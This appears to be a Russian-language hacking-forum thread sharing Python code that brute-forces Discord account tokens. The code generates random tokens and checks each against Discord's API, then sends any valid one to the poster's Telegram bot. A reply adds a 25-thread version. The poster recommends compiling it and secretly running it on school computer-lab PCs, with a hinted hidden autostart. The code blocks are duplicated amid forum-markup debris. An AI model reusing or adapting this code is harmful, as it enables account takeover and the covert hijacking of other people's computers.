какова вероятность тово что вы сгенерируете валидный токен? их почти что нет . Но можно же заставить майнить пк с кабинета информатики в школе или шараге Я посчитал и всего токенов может быть что-то 1.613906173804318e+119 А вот и сам код main.py from requests import get, post from random import randint import random import sys, os import telebot token = 'СЮДА ТОКИН' ID = "СЮДА ЧАТ АЙДИ" chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890-_" bot = telebot.TeleBot(token) Thisfile = sys.argv[0] # Полный путь к файлу, включая название и расширение Thisfile_name = os.path.basename(Thisfile) # Название файла без пути user_path = os.path.expanduser('~') # Путь к папке пользователя while True: one = ''.join((random.choice(chars) for i in range(24))) two = ''.join((random.choice(chars) for i in range(7))) three = ''.join((random.choice(chars) for i in range(randint(27, 38)))) def variant2(tokends): print(tokends) response = post(f'https://discord.com/api/v6/invite/{randint(1,9999999)}', headers={'Authorization': tokends}) if "You need to verify your account in order to perform this action." in str(response.content) or "401: Unauthorized" in str(response.content): None else: bot.send_message(ID, f"Нихуего ты нашел токен - {tokends}") variant2(f"{one}.{two}.{three}") Python from requests import get, post from random import randint import random import sys, os import telebot token = 'СЮДА ТОКИН' ID = "СЮДА ЧАТ АЙДИ" chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890-_" bot = telebot.TeleBot(token) Thisfile = sys.argv[0] # Полный путь к файлу, включая название и расширение Thisfile_name = os.path.basename(Thisfile) # Название файла без пути user_path = os.path.expanduser('~') # Путь к папке пользователя while True: one = ''.join((random.choice(chars) for i in range(24))) two = ''.join((random.choice(chars) for i in range(7))) three = ''.join((random.choice(chars) for i in range(randint(27, 38)))) def variant2(tokends): print(tokends) response = post(f'https://discord.com/api/v6/invite/{randint(1,9999999)}', headers={'Authorization': tokends}) if "You need to verify your account in order to perform this action." in str(response.content) or "401: Unauthorized" in str(response.content): None else: bot.send_message(ID, f"Нихуего ты нашел токен - {tokends}") variant2(f"{one}.{two}.{three}") 1 что делает код это генерирует токен Обычный токен выглядет так [/B][/SIZE][B][SIZE=6]one.two.three - тоесть 3 уровня в 1ом 24 символа, в 2ом 7 символов, а в 3 от 27 до 38 (чем меньше тем старей аккаунт) После этого он чекает его на валид не бейте он вроде работает если токен валид он отправляет его вам в тг (еще там есть автозапуск только тсссс) Вроде все расписал черному по белому дальше только скомпилить програму и все pyinstaller --onefile main.py надеюсь вы найдете токен но я в этом не уверен кто найдет тому отсосу https://tokenlucky.shirkalina.repl.co/ - можно чекнуть если повезет(не реклама конечно же)
Я кстати попробовал сделать многопоточность, с сохранением в файл, где теперь найти чекер токенов дискорд?
from requests import get, post from random import randint import random import sys, os import telebot import time import threading token = 'СЮДА ТОКЕН ТВОЕГО БОТА' ID = "СЮДА СВОЙ АЙДИ" chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890-_" bot = telebot.TeleBot(token) Thisfile = sys.argv[0] Thisfile_name = os.path.basename(Thisfile) user_path = os.path.expanduser('~') def variant2(tokends): print(tokends) response = post(f'https://discord.com/api/v6/invite/{randint(1, 9999999)}', headers={'Authorization': tokends}) if "You need to verify your account in order to perform this action." in str(response.content) or "401: Unauthorized" in str(response.content): print("Ошибка: необходимо пройти верификацию или токен не авторизован.") else: bot.send_message(ID, f"Нихуего ты нашел токен - {tokends}") def generate_and_send(): while True: one = ''.join((random.choice(chars) for i in range(24))) two = ''.join((random.choice(chars) for i in range(7))) three = ''.join((random.choice(chars) for i in range(randint(27, 38)))) variant2(f"{one}.{two}.{three}") time.sleep(1) threads = [] for _ in range(25): thread = threading.Thread(target=generate_and_send) threads.append(thread) thread.start() for thread in threads: thread.join() Python from requests import get, post from random import randint import random import sys, os import telebot import time import threading token = 'СЮДА ТОКЕН ТВОЕГО БОТА' ID = "СЮДА СВОЙ АЙДИ" chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890-_" bot = telebot.TeleBot(token) Thisfile = sys.argv[0] Thisfile_name = os.path.basename(Thisfile) user_path = os.path.expanduser('~') def variant2(tokends): print(tokends) response = post(f'https://discord.com/api/v6/invite/{randint(1, 9999999)}', headers={'Authorization': tokends}) if "You need to verify your account in order to perform this action." in str(response.content) or "401: Unauthorized" in str(response.content): print("Ошибка: необходимо пройти верификацию или токен не авторизован.") else: bot.send_message(ID, f"Нихуего ты нашел токен - {tokends}") def generate_and_send(): while True: one = ''.join((random.choice(chars) for i in range(24))) two = ''.join((random.choice(chars) for i in range(7))) three = ''.join((random.choice(chars) for i in range(randint(27, 38)))) variant2(f"{one}.{two}.{three}") time.sleep(1) threads = [] for _ in range(25): thread = threading.Thread(target=generate_and_send) threads.append(thread) thread.start() for thread in threads: thread.join() Решил дописать много-поток мб кому-то надо